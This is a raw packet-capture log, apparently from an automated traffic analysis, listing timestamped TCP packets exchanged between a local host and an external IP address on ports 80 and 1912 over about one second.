                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.864965916 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.864979982 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.866142035 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.866157055 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.866189957 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.866218090 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.867264032 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.867279053 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.867330074 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.868447065 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.868464947 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.868508101 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.869529009 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.869643927 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.870589018 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.870717049 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.871121883 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.871812105 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.871856928 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.872210026 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.872250080 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.873127937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.873146057 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.874241114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.874284983 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.874310017 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.874355078 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.055377007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.055677891 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.056361914 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.056524038 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.056611061 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.057585955 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.057605028 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.057662010 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.058804989 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.058825016 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.058891058 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.059818029 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.059998035 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.060137033 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.061100960 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.061116934 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.061189890 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.061759949 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.061899900 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.061961889 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.062956095 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.063218117 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.063288927 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.064292908 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.064660072 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.065334082 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.065347910 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.065397978 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.065424919 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.066478014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.066534042 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.066576958 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.067545891 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.067769051 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.068722010 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.068815947 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.069022894 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.069071054 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.069912910 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.070103884 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.070581913 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.071331024 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.071417093 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.072196007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.072273016 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.072465897 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.072508097 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.073419094 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.073805094 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.073848009 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.074670076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.074690104 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.074734926 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.075875044 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.075894117 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.075964928 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.076936007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.076951027 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.078064919 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.078087091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.078109026 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.078140974 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.079251051 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.079268932 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.079345942 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.080384016 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.080398083 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.080477953 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.081588030 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.081661940 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.082191944 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.082668066 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.082766056 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.082839012 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.083846092 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.084333897 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.084408998 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.085083961 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.085098028 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.085148096 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.086230993 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.086251020 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.086314917 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.087356091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.087636948 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.087688923 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.088550091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.088570118 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.088630915 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.089718103 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.089737892 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.089792967 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.090931892 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.090951920 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.091876984 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.091957092 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.092175007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.092262983 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.272819996 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.273566961 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.273590088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.273674965 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.274735928 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.274756908 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.274827003 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.274885893 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.274941921 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.274955034 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.275022030 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.275073051 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.275094032 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.275118113 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.275141001 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.275181055 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.275909901 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.275969028 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.276070118 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.276983976 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.277144909 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.277211905 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.278117895 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.278222084 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.278311968 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.279369116 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.279633045 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.279697895 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.280560970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.280581951 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.280648947 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.281687021 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.281707048 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.281794071 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.282831907 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.282906055 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.282972097 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.283938885 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.284219027 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.284295082 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.285202026 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.285223007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.285326958 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.286375999 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.286400080 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.286480904 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.287664890 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.333230972 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.418906927 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.419059992 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.419145107 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.419389963 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.419555902 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.419892073 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.420948029 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.420972109 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.421042919 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.421660900 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.421680927 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.421753883 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.422801971 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.423234940 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.423666954 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.423976898 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.423993111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.424055099 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.425143957 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.425164938 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.425220966 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.426305056 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.426325083 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.426486015 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.427438974 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.427556038 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.427614927 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.428630114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.428649902 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.428940058 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.429694891 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.429776907 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.429836988 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.430907965 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.430994034 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.431051016 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.432071924 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.432204008 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.432318926 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.433151007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.433455944 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.433538914 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.434324980 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.434493065 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.434557915 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.435472012 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.435643911 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.435709953 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.436645985 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.436944962 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.617183924 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.617326975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.617454052 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.618422031 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.618479967 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.618534088 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.619537115 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.619621992 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.619684935 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.620688915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.620832920 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.620889902 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.621931076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.621948004 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.622006893 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.623110056 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.623229027 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.623297930 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.624305010 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.624325991 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.624392986 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.625395060 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.625416994 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.625468016 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.626590014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.626610041 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.626672983 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.627691984 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.627990961 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.628047943 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.628880978 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.628978014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.629048109 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.629961014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.630242109 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.630314112 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.631304979 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.631397963 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.631463051 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.632258892 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.632354975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.632411003 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.633447886 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.633538008 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.633713961 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.634708881 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.634772062 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.634834051 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.635751963 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.635911942 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.636008978 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.636992931 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.637069941 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.637130976 CET4970880192.168.2.5185.81.68.147
